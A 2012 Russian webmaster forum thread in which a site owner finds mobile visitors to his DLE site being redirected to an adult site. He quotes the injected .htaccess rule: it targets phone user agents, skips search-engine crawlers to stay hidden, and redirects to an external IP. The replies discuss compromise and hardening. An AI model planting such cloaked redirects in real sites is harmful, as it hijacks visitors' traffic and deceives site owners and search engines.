X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
> Проблема с VDS
prohorov
prohorov
Topic Starter сообщение 5.7.2012, 21:01; Ответить: prohorov
Сообщение #1


Собственно сабж.

Сегодня решил почитать сайт через мобильный телефон и было большим удивлением то, что на свой сайт зайти я не могу, так как шла переадресация на сторонний ресурс. А именно ero888/com/s/5533

Покопавшись на VDSe нашел в .htaccess некий код который вел на выше указанный сайт.

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_vali
dator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yande
xaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yande
x
imageresizer) [NC]
RewriteRule (.*) http://91.121.64.83/?3 [L,R=302]


На это, хостер, мне ответил довольно стандартной фразой.

Тут не чего пояснять, взломали вам сайт или увели пароль от фтп

такое случается каждый день с десятками людей, у кого пароль увели а у кого движок старый и дырявый.

1. измените все пароли
2. проверте свой комп на вирусы.
3. обновите движки и плагины ВСЕХ сайтов до последних версий
4. Проведите аудит файлов сайтов на предмет залитого шела.

Если последние два пункта вызывают затруднения наймите опытного вэбмастера для проведения работ.


Ранее я сталкивался с темой о том, что хостеры самостоятельно добавляют подобные строчки дабы сливать мобильный трафик с сайта без ведома сайтовода. Хочу поинтересоваться у ребят со стажем. Был ли подобный опыт и на сколько правдивы слова хостера относительно этого вопроса? В принципе сайт взломать достаточно не просто, так как там стоят 20 - 30 значные (цифровые, буквенные) пароли на фтп и на базу, про остальное не говорю.

UPD: Движок DLE 9.2

Сообщение отредактировал prohorov - 5.7.2012, 21:04


--------------------
"Я предпочитаю пять долларов трем, вот, пожалуй, и все" (с) Игги Поп
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Lordie
Lordie
сообщение 5.7.2012, 21:03; Ответить: Lordie
Сообщение #2


prohorov, хостер прав. Нет, в работу VDS, обычно, никто и нигде не вмешивается.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
AleZ
AleZ
сообщение 5.7.2012, 21:04; Ответить: AleZ
Сообщение #3


На одном из ресурсов известных, которые распространяли Dle взломанные и как-бы чистые, как раз в мобильной версии была переадресация и тоже через htaccess. Так что тут мало данных. Возможно, был залит такой движок изначально.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
prohorov
prohorov
Topic Starter сообщение 5.7.2012, 21:05; Ответить: prohorov
Сообщение #4


AleZ, сайту полтора года, вряд ли первоначально такое было залито. плюс ко всему такого ранее не бывало. эта проблема, кстати, возникла с вашим хостером в подписи.
Lordie, не раз сталкивался с такой темой даже тут, на мауле. то что хостер сливает моб. трафик.

Сообщение отредактировал prohorov - 5.7.2012, 21:07


--------------------
"Я предпочитаю пять долларов трем, вот, пожалуй, и все" (с) Игги Поп
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Lordie
Lordie
сообщение 5.7.2012, 21:07; Ответить: Lordie
Сообщение #5


prohorov, хостинг и VDS - это все же разные вещи. И пенять на хостера не стоит, пока остальные варианты не исключены. В конце концов, если вы столь предрасположены против хостера - зачем брали у такого, какому доверия нету?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
prohorov
prohorov
Topic Starter сообщение 5.7.2012, 21:09; Ответить: prohorov
Сообщение #6


Lordie, За полтора года не было нареканий на camel. Проблема возникла буквально за 1 - 2 недели, так как ранее я заходил с мобильника/планшетника без особых проблем. Я не обвиняю именно хостера в этой проблеме, просто вся суть в том, что сайт, в плане паролей, закрыт довольно сильно.


--------------------
"Я предпочитаю пять долларов трем, вот, пожалуй, и все" (с) Игги Поп
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
AleZ
AleZ
сообщение 5.7.2012, 21:10; Ответить: AleZ
Сообщение #7


huh.gif У меня нет хостера в подписи и подписи как таковой. Что же касается VDS, то тут многое зависит от его настройки. Это вам не шаред, где все зависит от хостера и то, даже там рекомендовано на файлы вида htaccess ставить 444
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Lordie
Lordie
сообщение 5.7.2012, 21:12; Ответить: Lordie
Сообщение #8


prohorov, сайт, возможно, и закрыт сильно, а вот ваш ПК (или какой-либо иной, с которого вы подключались) - мог вполне быть и заражен. Если хостеру доверяете - тем более, следуйте и так предоставленной вам весьма четкой инструкции, обсуждать особо нечего.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Тирасполь
Тирасполь
сообщение 5.7.2012, 21:16; Ответить: Тирасполь
Сообщение #9


prohorov, задача дырку залатать или виноватого найти?
Предположим, Вам сейчас скажут, что хостер мог залить. И что? Поменяете хостера, опять зальют. Кого винить будете? Вы движетесь не в ту сторону. Устраняйте проблему, усиливайте безопасность - это единственное, что может дать положительный результат в таком случае.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
prohorov
prohorov
Topic Starter сообщение 5.7.2012, 21:17; Ответить: prohorov
Сообщение #10


AleZ, прошу прощения, промахнулсяwink.gif
Lordie, хотелось бы понять, чем и кемwink.gif
Тирасполь, Да это все понятно что не стоит искать виновного, вопрос в другом, каким образом усиливать защиту от подобного.

Сообщение отредактировал prohorov - 5.7.2012, 21:18


--------------------
"Я предпочитаю пять долларов трем, вот, пожалуй, и все" (с) Игги Поп
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыPQ.HOSTING - VPS/VDS - MD, UA, USA, HK, LV, NL, RU, CA, DE, SK, CZE, GB, IL, TR, PL, BG, RO, IT, FL, HU
77 pqhosting 36180 19.3.2024, 13:13
автор: pqhosting
Открытая тема (нет новых ответов) Проблема с админкой
5 Prok 2315 29.7.2019, 20:04
автор: dvakarandasha
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыПроблема с таблицей, которая выводится через скрипт
7 vanchester 1335 15.2.2019, 19:06
автор: Artos_mw
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыПроблема в тегах при сохранении контента
1 Kord18 1403 13.3.2018, 18:19
автор: Evgeniy3200
Открытая тема (нет новых ответов) Скрипт не передает данные с vds
Восстановить передачу данных...
0 Gera 2511 5.3.2018, 15:42
автор: Gera


 



RSS Текстовая версия Сейчас: 29.3.2024, 1:09
Дизайн